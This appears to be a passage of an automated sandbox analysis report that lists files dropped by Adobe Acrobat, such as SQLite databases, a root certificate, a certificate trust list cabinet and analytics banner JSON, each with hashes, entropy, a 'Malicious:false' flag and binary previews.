                                                                    SSDEEP:384:kkjiDp0Pogvn5pgqlzaekiqtyQqdRslkdMCC/J0Xum3O5JMZ5lQnsN:kkjcp0GhekH1qv7Jis/3zN
                                                                    MD5:EDF4BC620FE407C6970CDAF5585ADE74
                                                                    SHA1:FF838C5205409B571B5FA183F69EEAAE321F9AE6
                                                                    SHA-256:9ADA9F269BC6944820567EE88B25DAF845BB152B8FA8AB2B49327371AA056234
                                                                    SHA-512:84CB20C3B5FC59B2ACA0402F262A52A1BEDCE267D29E57BE2FA16F96437C13CC60375FFD12BC71BDA2297E5C53F4FBE9747CC86119A3CBE4260D14694499F210
                                                                    Malicious:false
                                                                    Preview:BMv.......6...(...n...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 15, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 15
                                                                    Category:dropped
                                                                    Size (bytes):86016
                                                                    Entropy (8bit):4.439138148953171
                                                                    Encrypted:false
                                                                    SSDEEP:384:yeaci5GGiBA7vEmzKNURFXoD1NC1SK0gkzPlrFzqFK/WY+lUTTcKqZ5bEmzVz:1OurVgazUpUTTGt
                                                                    MD5:88CACB9BAE765C16D60358A349D1A7B9
                                                                    SHA1:206272E6FBE45A9474A99B48FD2123968B90BB38
                                                                    SHA-256:355C4178922536A05CEBF3314ACEE939E5F6107524D8392A1F24E151647D54C1
                                                                    SHA-512:2E96C45BE08E3C0D486A8A8DEFB697B9DF97C8157F6238C3B8691B731BDE2F17236C360FC199ECA0C49717B538A2A0617E8312B78B7CA6A8D424A2D8FF5D64EF
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:SQLite Rollback Journal
                                                                    Category:dropped
                                                                    Size (bytes):8720
                                                                    Entropy (8bit):3.77720792223578
                                                                    Encrypted:false
                                                                    SSDEEP:48:7M5p/E2ioyVaioy3DoWoy1CABoy1mKOioy1noy1AYoy1Wioy1hioybioy8oy1noS:7qpjua0iAyXKQ9Ub9IVXEBodRBks
                                                                    MD5:0E8A90B8F69472738B27C2FBFA59DD81
                                                                    SHA1:E7B581CCCD18055BBA78BA594CF6D80C40CEDEE7
                                                                    SHA-256:66EAAA31D384F315CCF49D5B1B59A69315F3FC7D5553A4D9BBAAD6F560F7566A
                                                                    SHA-512:545360EADB01BCE242DAA5BD30EF382D9699B12F4A7C65CA312EE2FD591CC514532987522E5F95FF2076793419F1C1A99280BF4AD22B2988AA922A3EC80073CC
                                                                    Malicious:false
                                                                    Preview:.... .c.......L...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b...r...t...}.....L..............................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:Certificate, Version=3
                                                                    Category:dropped
                                                                    Size (bytes):1391
                                                                    Entropy (8bit):7.705940075877404
                                                                    Encrypted:false
                                                                    SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                    MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                    SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                    SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                    SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                    Malicious:false
                                                                    Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                    Category:dropped
                                                                    Size (bytes):71954
                                                                    Entropy (8bit):7.996617769952133
                                                                    Encrypted:true
                                                                    SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                    MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                    SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                    SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                    SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                    Malicious:false
                                                                    Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):192
                                                                    Entropy (8bit):2.750416612246742
                                                                    Encrypted:false
                                                                    SSDEEP:3:kkFklrKftvfllXlE/HT8k1HzlXNNX8RolJuRdxLlGB9lQRYwpDdt:kKZVQT88XNMa8RdWBwRd
                                                                    MD5:94803E159EEB409AFD3DD73E76BEFFCA
                                                                    SHA1:DC877BDD532CD2EFAEAD3E441AEABA5E0CCBB161
                                                                    SHA-256:274E8243621CD10797C67A506F5239EEC3CF424FDD998014B4B37A4FF9F490D4
                                                                    SHA-512:58082D87CE290BA9489370C00D9B228254C4A66E12C751CA89EF12DF1E513E1A8A0666D999C7154C6AEFD9B9972FB9441B544B5206EA6C34943A427E923254F0
                                                                    Malicious:false
                                                                    Preview:p...... ........X/.y7U..(....................................................... ..........W...................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):328
                                                                    Entropy (8bit):3.247897867253901
                                                                    Encrypted:false
                                                                    SSDEEP:6:kK/9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:2DImsLNkPlE99SNxAhUe/3
                                                                    MD5:A5AB5CF305B4D51BD7BF6DC3E1886076
                                                                    SHA1:7B11FF9382A8C25B2346A192754254C735C86C62
                                                                    SHA-256:537190E903912577572931D12DF7D3997FAF8B4F9B983A2009B3DDA6E89F79A0
                                                                    SHA-512:057A9572BAD2856466D0F1CA01F4CA49BB74FF424759078A203B089BA600CE0E5F40178ABC73564E43036AD5542323BC2B0AFF81E5098BA6EA7D3BD5315FD189
                                                                    Malicious:false
                                                                    Preview:p...... ...........z7U..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):295
                                                                    Entropy (8bit):5.372007030036697
                                                                    Encrypted:false
                                                                    SSDEEP:6:YEQXJ2HXtQs6Pi14WsGiIPEeOF0YMjUoAvJM3g98kUwPeUkwRe9:YvXKXtjL1bsdTeOsDGMbLUkee9
                                                                    MD5:073A36221CADA8A60D3A0C40A202A98D
                                                                    SHA1:87C01F66744048678CFF96F0165FB456C1D6901F
                                                                    SHA-256:B4D331322CB5EC13A71A7F7A0AE4F321CA3B2BE5D306D9EC1ADBAA0157BBCA2B
                                                                    SHA-512:B3ADD515144667ADF4C31122227872D8E02F80187CE6AAA40C4F94E8ED77F71DB783EA7994863398376D36E4537351B1F6E51AED42464D59B2FD29B1DAB15987
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"36c4d023-bac6-420c-b36a-3468eb0e7b8d","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735130869535,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):294
                                                                    Entropy (8bit):5.3087400722597025
                                                                    Encrypted:false
                                                                    SSDEEP:6:YEQXJ2HXtQs6Pi14WsGiIPEeOF0YMjUoAvJfBoTfXpnrPeUkwRe9:YvXKXtjL1bsdTeOsDGWTfXcUkee9
                                                                    MD5:20F5D8A940A3622C32E1FA543AB7B1A7
                                                                    SHA1:055072A243A6BF9011C078B0FA164630404FC7C1
                                                                    SHA-256:08EBA7D515295453E2BD1C08E3DFE2F7B9068FDBBDCA36EC4D37D7F8A22112E4
                                                                    SHA-512:99A81C9A7458D396DABEF0BE08AECC491BBF27306E966200B4C3D73C93BE130DA81940B7971B441A1991140CD31D4D215D8770ED97A80C1852FE25E3C9ED96F6
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"36c4d023-bac6-420c-b36a-3468eb0e7b8d","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735130869535,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):294
                                                                    Entropy (8bit):5.28687898700497
                                                                    Encrypted:false
                                                                    SSDEEP:6:YEQXJ2HXtQs6Pi14WsGiIPEeOF0YMjUoAvJfBD2G6UpnrPeUkwRe9:YvXKXtjL1bsdTeOsDGR22cUkee9
                                                                    MD5:B9329EC3182C1B6411CB4685DEEA4B33
                                                                    SHA1:C9402A5EEE31772AC6B7FF3CC8C6233A9AC4FA17
                                                                    SHA-256:A1992C0B20D92EEEFE63543349E3251848CC6590D7382642BF805E3EBDAF5265
                                                                    SHA-512:4E184C209A2AE95B340B6B29C740B373DF0ED6BB389D740D140B8E4E3C02C5B248DCDA4B5441E334C58CE4BCB24F2DFAC173F2A98FAACDAA674E1167A0686913
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"36c4d023-bac6-420c-b36a-3468eb0e7b8d","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735130869535,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):285
                                                                    Entropy (8bit):5.359188618936057
                                                                    Encrypted:false
                                                                    SSDEEP:6:YEQXJ2HXtQs6Pi14WsGiIPEeOF0YMjUoAvJfPmwrPeUkwRe9:YvXKXtjL1bsdTeOsDGH56Ukee9
                                                                    MD5:B947C16C692A73DD9FCC0A854BE0D6D9
                                                                    SHA1:F31B564483377559E3AB734F2D15B8CC61129812
                                                                    SHA-256:8F8003C0B6FF9F89EE8BB9DD1841131A482BB0559453D9AD3013F35427C3716B
                                                                    SHA-512:969732436F0682B01EB906483EA1A2063D523DA87371AC6D60A5AE40CDC1F537E1B14121215CC58AEB83545DBEFFDA34B23B24DEAAB239EBBDF3B09FC3CFA153
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"36c4d023-bac6-420c-b36a-3468eb0e7b8d","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735130869535,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):1123
                                                                    Entropy (8bit):5.683556193057035
                                                                    Encrypted:false
                                                                    SSDEEP:24:Yv6XtjdmeOsYpLgE9cQx8LennAvzBvkn0RCmK8czOCCSGr:YvHeWhgy6SAFv5Ah8cv/s
                                                                    MD5:8A8720C46DEF4CFAEA983CB2FDFFF230
                                                                    SHA1:A7CDC583F9F0F5C7101C20DD8A27D7B090D952E3
                                                                    SHA-256:3BB31C699268C23ED3BF7A032A7FBF857F9A17E5C1656663CF1FD66260CCB516
                                                                    SHA-512:41CCE2C42441F72BB9290709FEFE4FE6894FEDFC0CFAD61209FB51803703DC518E3A56AF5A85DAB67E6F1E20EC1D282327E1E89FE6C4D783EF7C120C62D73E13
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"36c4d023-bac6-420c-b36a-3468eb0e7b8d","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735130869535,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):289
                                                                    Entropy (8bit):5.294176939637967
                                                                    Encrypted:false
                                                                    SSDEEP:6:YEQXJ2HXtQs6Pi14WsGiIPEeOF0YMjUoAvJf8dPeUkwRe9:YvXKXtjL1bsdTeOsDGU8Ukee9
                                                                    MD5:4784338E2E7A5DC842A5358A697F309F
                                                                    SHA1:D4353DDE43AE9EBD6E0715BC07F46E0CCB1607EB
                                                                    SHA-256:814FC1E376BB977292131153F2006286D8531C9F9D3BCD5A38FA61AC4F317782
                                                                    SHA-512:EE4D292E6E677EF014B75B8C4CF7FF09584E06BAC3276EAECA4F345D2053584CB6DD4D5C0CA7F209B29798E91AB77E033B90DBEC8E511EF772B82BF3168D090F
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"36c4d023-bac6-420c-b36a-3468eb0e7b8d","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735130869535,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):292
                                                                    Entropy (8bit):5.298137401224926
                                                                    Encrypted:false
                                                                    SSDEEP:6:YEQXJ2HXtQs6Pi14WsGiIPEeOF0YMjUoAvJfQ1rPeUkwRe9:YvXKXtjL1bsdTeOsDGY16Ukee9
                                                                    MD5:94C710A90715A0ACC046B1D9DB430DEC
                                                                    SHA1:40C3197C1CCE7AA025BF44A865BC72836B2518A0
                                                                    SHA-256:40A4F6C248ABB9A727A79A8AEFF206ECCE1F6752D34B924091BFF6D2D43F3FD0
                                                                    SHA-512:F11B0D46918F06997E7BD1FD2E223F167E3388667E3281DF03B38D012D47EB45965977BD6EAF31ADC6369C8F7CD9A73C7D99ADCDB38FD4ADDCC50E02A939C308
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"36c4d023-bac6-420c-b36a-3468eb0e7b8d","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735130869535,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):289
                                                                    Entropy (8bit):5.3140925922665
                                                                    Encrypted:false
                                                                    SSDEEP:6:YEQXJ2HXtQs6Pi14WsGiIPEeOF0YMjUoAvJfFldPeUkwRe9:YvXKXtjL1bsdTeOsDGz8Ukee9
                                                                    MD5:060A6721B8163F6AB3078577AACA30D7
                                                                    SHA1:D0E82FE1AE65B7F758B8833A3D6D73A2DFB2F6CC
                                                                    SHA-256:3464D63E8B0A74349B7475A9C26BF47535E34EFDF375B76F393D2737C2213431
                                                                    SHA-512:DCCDA5092477D75F839D191F95AB2D354B4E5B601D903CFB1B9E9CFBF676DF3CFADB26225C02C8D4A70807A39741E1D55023063BB557416EC225FB74055EFA18
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"36c4d023-bac6-420c-b36a-3468eb0e7b8d","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735130869535,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):295
                                                                    Entropy (8bit):5.320872634599077
                                                                    Encrypted:false
                                                                    SSDEEP:6:YEQXJ2HXtQs6Pi14WsGiIPEeOF0YMjUoAvJfzdPeUkwRe9:YvXKXtjL1bsdTeOsDGb8Ukee9
                                                                    MD5:EE7B575754CC51FFBD4D06DCEF25C781
                                                                    SHA1:6DD313024432C736154E262520797BAB43D4E71E
                                                                    SHA-256:FD830F049FFA033621ADAFEDAC0F5499BD0A54AFC1ED8BA98405AA0282880148
                                                                    SHA-512:4E31114B4F3D8107F620D13FB7C23C16CEED6A224C83F2F5619C3E674DA7BCCC4393D0B3587D1122CBDB55A3AEF50A2870424A52217AD9A8F9388279F62A6A35
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"36c4d023-bac6-420c-b36a-3468eb0e7b8d","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735130869535,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):289
                                                                    Entropy (8bit):5.301547706376511
                                                                    Encrypted:false
                                                                    SSDEEP:6:YEQXJ2HXtQs6Pi14WsGiIPEeOF0YMjUoAvJfYdPeUkwRe9:YvXKXtjL1bsdTeOsDGg8Ukee9
                                                                    MD5:92AE0C5ADA47793FBDF52140FC97D765
                                                                    SHA1:6AB5A68CBF3D243B2848C72422F247B746093023
                                                                    SHA-256:5E97EACDF8DE1597A583D7D9DA06C1186F414C0BA0A8B1324B426B38AE1DDEFD
                                                                    SHA-512:BCDD23142D826EB8763931DDC97B58368EB57FE4400FF6A88F1C712A1F55DC7AAF7998AADE2F657C35BF206370D5E4CDC20A876B740074B606E4BD6719F36E76
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"36c4d023-bac6-420c-b36a-3468eb0e7b8d","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735130869535,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):284
                                                                    Entropy (8bit):5.2879243184787255
                                                                    Encrypted:false
                                                                    SSDEEP:6:YEQXJ2HXtQs6Pi14WsGiIPEeOF0YMjUoAvJf+dPeUkwRe9:YvXKXtjL1bsdTeOsDG28Ukee9
                                                                    MD5:6D777DCEC0AACBA87F16790A28327475
                                                                    SHA1:F90B54A8145D310E3115C7FC0DB85CA9C753532A
                                                                    SHA-256:AF24A7FEB133C04D332EE4A5021AC02FB87EB42D029C173D570076C057E7E021
                                                                    SHA-512:410C57EEC6D5BCE7F9E62504504E84048426F2074D8A783A99A3EC835241B665B89C529A57FD129F65E774ACDB8DDC9C88C32E10147B5B81A8DFA8830D371AC8
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"36c4d023-bac6-420c-b36a-3468eb0e7b8d","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735130869535,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):291
                                                                    Entropy (8bit):5.285084166893148
                                                                    Encrypted:false
                                                                    SSDEEP:6:YEQXJ2HXtQs6Pi14WsGiIPEeOF0YMjUoAvJfbPtdPeUkwRe9:YvXKXtjL1bsdTeOsDGDV8Ukee9
                                                                    MD5:B8D7E28F1CC69C37E60325E64D1777A8
                                                                    SHA1:64A3C5836148896E5873925BA1CE5A5CD156399C
                                                                    SHA-256:BB2D40E98C907552976C8EB0BCF8E5FB15E52D254F03D00E27B9C9A2E7FED0B7
                                                                    SHA-512:BE31B0FC775683A095A8106BA2D0A96F2938FC27101D7AAA87A26E23BE99811404E70FBC4E7E4739D28EEE71A99FC91CE324C42425820AEEEB5A37FCF129F695
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"36c4d023-bac6-420c-b36a-3468eb0e7b8d","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735130869535,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):287
                                                                    Entropy (8bit):5.289757042096889
                                                                    Encrypted:false
                                                                    SSDEEP:6:YEQXJ2HXtQs6Pi14WsGiIPEeOF0YMjUoAvJf21rPeUkwRe9:YvXKXtjL1bsdTeOsDG+16Ukee9
                                                                    MD5:202140D01B77868ABAFF2914E91F2BBD
                                                                    SHA1:DD78D946B6E2587614CCFA6795D8F816B0235BDA
                                                                    SHA-256:7C93F76E77378C85298CEF81B6457D39612EA05C40F908B4BFB5DB4E5A27027F
                                                                    SHA-512:D3076F53A8CED49C558F792D6B826E150B3A9D605AA610F3EDFDC580851657A793CFC6335E0D9EF401509D09BB5B2F405B515D635A56626A4CD51370ED7D9906
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"36c4d023-bac6-420c-b36a-3468eb0e7b8d","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735130869535,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):1090
                                                                    Entropy (8bit):5.6572598014319
                                                                    Encrypted:false
                                                                    SSDEEP:24:Yv6XtjdmeOssamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSGr:YvHeEBgkDMUJUAh8cvMs
                                                                    MD5:E079811D4C9A92646C12A9FE53D2AA25
                                                                    SHA1:13ABDE01AE91594A0D3D5F0A427FD87F1CB080D1
                                                                    SHA-256:1213DF95BAF659A81699F20E89C1A6529E52E0AA4BB9A38FFC9F5FFE502A8B10
                                                                    SHA-512:039247BA0CCC8481929C08847A7F81B046E8B5AC69245D2CCC4DD2DEFA91A873EF813ED09EC4B246FD359F43C27DE4C4C8F15A5D13295E9B4041186BBB658753
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"36c4d023-bac6-420c-b36a-3468eb0e7b8d","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735130869535,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):286
                                                                    Entropy (8bit):5.265403837349398
                                                                    Encrypted:false
